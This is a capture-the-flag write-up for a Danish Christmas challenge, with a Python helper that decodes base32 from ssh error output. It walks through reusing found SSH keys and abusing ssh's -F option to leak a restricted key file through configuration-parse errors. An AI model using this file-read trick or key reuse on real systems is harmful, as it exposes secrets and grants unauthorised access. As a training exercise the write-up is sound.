FDCA Xmas 2024 Day 15 - No Command Here - Part 2
This is a continuation of No Command Here - Part 1; we will be using the same private key and domain from that challenge.
Challenge Description
Danish (original)
Din indsats med at aflure Loke’s tankeboks har været værdsat. Der er dog tegn på at denne tankeboks indeholder mere end bare Loke’s tanker. Han og Fenris har historisk været meget tætte, så vi er overbeviste om at Loke havde bare lidt adgang til Fenris egen tankeboks.
Vi regner med dig.
English (from ChatGPT)
Your effort in deciphering Loki’s thought box has been appreciated. However, there are signs that this thought box contains more than just Loki’s thoughts. He and Fenrir have historically been very close, so we are convinced that Loki had at least some access to Fenrir’s own thought box.
We are counting on you.
Solution
Using the ls and cat utils from Part 1 we find and export five private keys:
bash$ ls .ssh
-bash: .ssh/authorized_keys: Permission denied
-bash: .ssh/fenrir.echo.priv: Permission denied
-bash: .ssh/fenrir.id.priv: Permission denied
-bash: .ssh/fenrir.ls.priv: Permission denied
-bash: .ssh/fenrir.pwd.priv: Permission denied
-bash: .ssh/fenrir.ssh.priv: Permission denied
Using fenrir.ls.priv we can list fenrir’s files:
$ ssh -p 2222 -i fenrir.ls.priv fenrir@jættenettet.dk
Contemplations.txt
Connection to jættenettet.dk closed.
$ ssh -p 2222 -i fenrir.ls.priv fenrir@jættenettet.dk .ssh
authorized_keys
vaultkey.encrypted
Connection to jættenettet.dk closed.
While trying to find a way to read vaultkey.encrypted, I fell over this error:
$ ssh -p 2222 -i fenrir.ssh.priv fenrir@jættenettet.dk
Can't open user config file : No such file or directory
Connection to jættenettet.dk closed.
Looking at the ssh manpage and searching for user config, I found the -F flag, and looking at GTFOBins, we may be able to read files with it:
$ ssh -p 2222 -i fenrir.ssh.priv fenrir@jættenettet.dk .ssh/vaultkey.encrypted localhost
.ssh/vaultkey.encrypted line 1: no argument after keyword "fuws2ljnijcuoskoebhvarkoknjuqicqkjevmqkuiuqewrkzfuws2ljnbjrdgqtmmjxe46tbimyx"
[expunged for readability]
.ssh/vaultkey.encrypted: line 55: Bad configuration option: hu6quljnfuws2rkoiqqe6ucfjzjvgsbakbjesvsbkrcsas2flews2ljnfufa
.ssh/vaultkey.encrypted: terminating, 55 bad configuration options
Connection to jættenettet.dk closed.
Since vaultkey.encrypted only contains lowercase letters (a-z) and the digits 2 to 7, it is probably not base64 encoded, but instead base32 (26 letters and 6 digits).
So decoding vaultkey.encrypted from base32 we get another private ssh key:
Using this key we get the flag:
$ ssh -p 2222 -i vaultkey.priv vault@jættenettet.dk
FDCA{S5H_B3_M4de_Quit3_Str1ct}
Connection to jættenettet.dk closed.
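The recovery step described above (collecting the tokens ssh echoes in its config-parse errors, checking the a-z/2-7 alphabet, then base32-decoding), as an added example that is not part of the original write-up. The function names are this example's own, and the ssh output it parses is constructed from a dummy plaintext by the hypothetical helper make_sample.

```python
import base64
import re
import textwrap

# The two message shapes seen in the transcript; the echoed token is the line's content.
LINE_PATTERNS = (
    re.compile(r'line (\d+): no argument after keyword "([^"]*)"'),
    re.compile(r"line (\d+): Bad configuration option: (\S+)"),
)
BASE32_ALPHABET = set("abcdefghijklmnopqrstuvwxyz234567")


def extract_tokens(ssh_output: str) -> list[str]:
    """Return the echoed tokens ordered by their reported line number."""
    found = {}
    for line in ssh_output.splitlines():
        for pattern in LINE_PATTERNS:
            m = pattern.search(line)
            if m:
                found[int(m.group(1))] = m.group(2)
                break
    return [found[n] for n in sorted(found)]


def decode_base32_tokens(tokens: list[str]) -> bytes:
    """Join the tokens, check the alphabet, restore padding and decode."""
    stream = "".join(tokens)
    if not set(stream) <= BASE32_ALPHABET:
        raise ValueError("characters outside a-z / 2-7: not lowercase base32")
    stream += "=" * (-len(stream) % 8)  # the echoed tokens carry no '=' padding
    return base64.b32decode(stream, casefold=True)


def make_sample(plaintext: bytes, name: str = "sample.encrypted") -> str:
    """Constructed stand-in for the ssh output: same shapes, dummy content."""
    encoded = base64.b32encode(plaintext).decode().lower().rstrip("=")
    chunks = textwrap.wrap(encoded, 76)
    out = [f'{name} line 1: no argument after keyword "{chunks[0]}"']
    out += [f"{name}: line {i}: Bad configuration option: {c}"
            for i, c in enumerate(chunks[1:], start=2)]
    out.append(f"{name}: terminating, {len(chunks)} bad configuration options")
    return "\n".join(out)


# Constructed dummy plaintext, not a real key.
SAMPLE_PLAINTEXT = b"-----BEGIN DUMMY KEY-----\n" + b"not a real key!\n" * 8 + b"-----END DUMMY KEY-----\n"

if __name__ == "__main__":
    print(decode_base32_tokens(extract_tokens(make_sample(SAMPLE_PLAINTEXT))).decode())
```

The alphabet check mirrors the reasoning in the text: base64 output would normally include uppercase letters and the digits 0, 1, 8 and 9, so a stream limited to a-z and 2-7 points to base32.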